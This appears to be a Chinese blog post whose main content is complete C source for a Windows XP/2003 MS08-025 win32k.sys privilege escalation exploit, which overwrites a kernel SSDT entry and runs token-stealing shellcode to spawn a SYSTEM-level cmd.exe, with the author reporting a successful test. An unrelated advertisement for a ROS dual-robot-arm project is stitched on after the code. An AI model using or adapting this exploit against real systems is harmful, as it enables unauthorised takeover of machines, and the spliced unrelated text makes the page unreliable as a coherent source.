MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit2

本文介绍了一种针对Windows XP SP2系统的MS08-025漏洞利用方法,通过覆盖SSDT表中的NtVdmControl地址来实现权限提升。文中详细展示了如何使用C语言编写shellcode并进行内存分配,最终达到从普通用户权限升级到SYSTEM权限的目的。
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行



#include <stdio.h>

#include <windows.h>



typedef LONG NTSTATUS;

typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,

                                       PVOID            *BaseAddress,

                                       ULONG                ZeroBits,

                                       PULONG           RegionSize,

                                       ULONG                AllocationType,

                                       ULONG                Protect );

typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);

void ErrorQuit(char *msg)

{

    printf("%s:%x/n", msg, GetLastError());

    ExitProcess(0);

}

ZWVDMCONTROL    ZwVdmControl=NULL;

OSVERSIONINFOEX OsVersionInfo;



_declspec(naked) int ShellCode()

{



      if ( OsVersionInfo.dwMinorVersion == 1 ) {



       __asm {



               nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



searchXp:



               mov eax,[eax+0x88]

               sub eax,0x88

               mov edx,[eax+0x84]

               cmp edx,0x4 // Find System Process

               jne searchXp



               mov eax,[eax+0xc8] // 获取system进程的token

               mov [esi+0xc8],eax // 修改当前进程的token



               ret 8



       }

   }

   if ( OsVersionInfo.dwMinorVersion == 2 ) {



       __asm {



           nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



search2003:



               mov eax,[eax+0x98]

               sub eax,0x98

               mov edx,[eax+0x94]

                cmp edx,0x4 // Find System Process

               jne search2003



               mov eax,[eax+0xd8] // 获取system进程的token

               mov [esi+0xd8],eax // 修改当前进程的token

               ret 8



       }

   }





}



void InitTrampoline()

{



   PNTALLOCATE NtAllocateVirtualMemory;

   LPVOID       addr = (LPVOID)3;

   DWORD       dwShellSize=0x1000;

   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0

                               "/xc3";               // retn



   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");



   if( !NtAllocateVirtualMemory )

       exit(0);



   NtAllocateVirtualMemory(   (HANDLE)-1,

                               &addr,

                               0,

                               &dwShellSize,

                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,

                               PAGE_EXECUTE_READWRITE );



   if( (PULONG)addr )

   {

       printf("/n[++] Error Allocating memory/n");

       exit(0);

   }





   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;

   memcpy(NULL,trampoline,sizeof(trampoline)-1);

}

int Callback_Overview()

{

   printf("/n");

   printf("=====================================================================   /n");

   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");

   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");

   printf("=====================================================================   /n");

   printf("+ References:/n");

   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");

   printf(" http://hi.baidu.com/vessial/n/n");

   return 1;

}



void GetFunction()

{

    HANDLE    hNtdll,hNtos;

   

    hNtdll = LoadLibrary("ntdll.dll");

    if(hNtdll == NULL)

        ErrorQuit("LoadLibrary failed./n");

       

    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");

    if(ZwVdmControl == NULL)

        ErrorQuit("GetProcAddress failed./n");

              

    FreeLibrary(hNtdll);

}

int main(int argc, char **argv)

{



   //PULONG   PntVdmControl=0x805F0DB0;

PULONG   PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得

   

    

   STARTUPINFOA                stStartup;

   PROCESS_INFORMATION            pi;





   Callback_Overview();

   GetFunction();

   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );

   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);



   if ( OsVersionInfo.dwMajorVersion != 5 ) {



       printf( "Not NT5 system/n" );

       ExitProcess( 0 );

   }

   //Get Operatiny System Version

       

   InitTrampoline();



   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表,覆盖后结果为0x0

   printf("/n[+] Executing Shellcode.../n");



   ZwVdmControl(0, NULL);//这里就是call 0x0了,跳转执行我们的shellcode,哈哈:)

   GetStartupInfo( &stStartup );



   CreateProcess( NULL,

       "cmd.exe",

       NULL,

       NULL,

       TRUE,

       NULL,

       NULL,

       NULL,

       &stStartup,

       &pi );   //此时创建的cmd.exe是SYSTEM权限



  

   printf("[+] Exiting.../n");



   return TRUE;

}

我在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限
本项目采用C++编程语言结合ROS框架构建了完整的双机械臂控制系统,实现了Gazebo仿真环境下的协同运动模拟,并完成了两台实体UR10工业机器人的联动控制。该毕业设计在答辩环节获得98分的优异成绩,所有程序代码均通过系统性调试验证,保证可直接部署运行。 系统架构包含三个核心模块:基于ROS通信架构的双臂协调控制器、Gazebo物理引擎下的动力学仿真环境、以及真实UR10机器人的硬件接口层。在仿真验证阶段,开发了双臂碰撞检测算法和轨迹规划模块,通过ROS控制包实现了末端执行器的同步轨迹跟踪。硬件集成方面,建立了基于TCP/IP协议的实时通信链路,解决了双机数据同步和运动指令分发等关键技术问题。 本资源适用于自动化、机械电子、人工智能等专业方向的课程实践,可作为高年级课程设计、毕业课题的重要参考案例。系统采用模块化设计理念,控制核心与硬件接口分离架构便于功能扩展,具备工程实践能力的学习者可在现有框架基础上进行二次开发,例如集成视觉感知模块或优化运动规划算法。 项目文档详细记录了环境配置流程、参数调试方法和实验验证数据,特别说明了双机协同作业时的时序同步解决方案。所有功能模块均提供完整的API接口说明,便于使用者快速理解系统架构并进行定制化修改。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值